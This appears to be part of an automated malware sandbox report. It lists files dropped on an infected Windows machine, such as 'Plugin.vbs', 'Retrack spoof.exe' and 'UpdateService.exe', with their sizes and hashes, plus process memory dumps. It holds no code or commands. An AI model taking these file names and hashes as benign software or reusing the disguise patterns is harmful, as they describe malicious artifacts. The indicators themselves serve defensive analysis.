C:\Users\Admin\AppData\Local\Temp\tmp69AC.tmp
Filesize
1KB

MD5
afb71a33ece3758f782f052bbe5da94f

SHA1
e69b9070ff52f81fdf01a40f775d021e4b4e71e4

SHA256
abd73bfca8458750ee751d4c6c106d54dcf0969592f476acc64ab0d7f2bb1978

SHA512
22c45992ca358ca9d4605ac426b65903b11b27db1b9c608739245dc412aa256d0908566626b3cfdafb32fca0809bf46c8824ab98cea7b7662216c915e6ef013f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
20913ebbaa2d617495259be39d3d88cf

SHA1
402cfdc1699b5449a0a2feb0cf61491abd21e311

SHA256
490772b456007097851707fc6e3aed96d20929ac1a1a0add9bfb81d52509080c

SHA512
137d8e29556da1d22410a9efbf8c07ea4ffac69a7434b28df8c497177f97b93f356824563c758de6684e87f9f60ed4d6ecb25a90cc57dab6b841086b8e59602b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
1d28550e295d7afcadea0ae5ef7912c6

SHA1
39e8e0f5f2a6d926ee65abcfb2a12a9ffaf43d54

SHA256
8873da1234253c1621f2cfdf8465e5ce917b5ba578c2bb26f62bd39373d14a1e

SHA512
63c25a7cec601606dacec6493e3ba3e7f7f8e931a7c91aeb85b1480e0e4148a5d548a356c3c5fa7e91d20e754f6ee934b5cb064d20eadae77a8aeba68df0d590

Download Submit
C:\Windows\Plugin (2).exe
Filesize
92KB

MD5
b5dc91de17a295dff74f04775cb4b0f6

SHA1
04b4174239e0640926e0e4baa19e3bde697e3c17

SHA256
751de7168c8a1da0803db0a0c13abb2f9f0d40d2989ca31967f329b2a4f635bc

SHA512
70c4f9e0630652369fdf4a79f459d271e1dc8a3efe6560970b1092c6e394a725a6045d8010e0cd5ced345eaa5e56f33f3c8365474bd0a3209ce3778a8db20331

Download Submit
C:\Windows\Plugin.vbs
Filesize
1KB

MD5
14ea261d44218a9791555b72a7767c29

SHA1
4bce49b19c36e59da55d95bed268450ae99f01a3

SHA256
4ead5762a374a921de330d5f2fd3ad4aaf015bc7d004d34c97740f5804085cb4

SHA512
2eae9a9e13c4137e864e75c2f22cb2761a86d6282d6f28bd06f11032a664c140d1055067ff73056d3dc0469fc44e4bbe3dc922317f0ff6d4f08551a719bf1d60

Download Submit
C:\Windows\Retrack spoof.exe
Filesize
499KB

MD5
2304b7950394e771b89b4dde4dcccff9

SHA1
e9cdb5b9b5afe2125c2086293ae20fd11129edc1

SHA256
9cdf6b9e97cb1168697b7cb4c0ae472c7d26cf867c3ba44b3c6a33fa1e6a7b43

SHA512
16bb035c8935370c876703b404712112ff68743853c3dd74f4420423f4547340b3d29f606ffc343d21ca8a47859080c3e884bc8c49c54d9b8d5f9feca996eef0

Download Submit
C:\Windows\UpdateService.exe
Filesize
203KB

MD5
23296053d543c5fce94532c2717c8710

SHA1
50edfa61b97bb2454e91d88f6c48d2b0d591d95e

SHA256
0974a318654b48f0c01caec006a8acee83243fc1b585da6c68fa24d0eb71aeaa

SHA512
36396a0aa8551a06c73cdbc661d7e5d8fe238e2f095f51657dbcf6d05ecd47e80715a863942b8c600109719640e787e797289ee0cdcfa9e20cb6cdb3f354fa81

Download Submit
memory/1720-40-0x0000000001280000-0x0000000001304000-memory.dmp

Filesize
528KB

Download
memory/2200-0-0x000007FEF5E83000-0x000007FEF5E84000-memory.dmp

Filesize
4KB

Download
memory/2200-29-0x000007FEF5E80000-0x000007FEF686C000-memory.dmp

Filesize
9.9MB

Download
memory/2200-1-0x0000000000EB0000-0x0000000000F80000-memory.dmp

Filesize
832KB

Download
memory/2200-97-0x000007FEF5E80000-0x000007FEF686C000-memory.dmp

Filesize
9.9MB

Download
memory/2776-33-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/2776-32-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download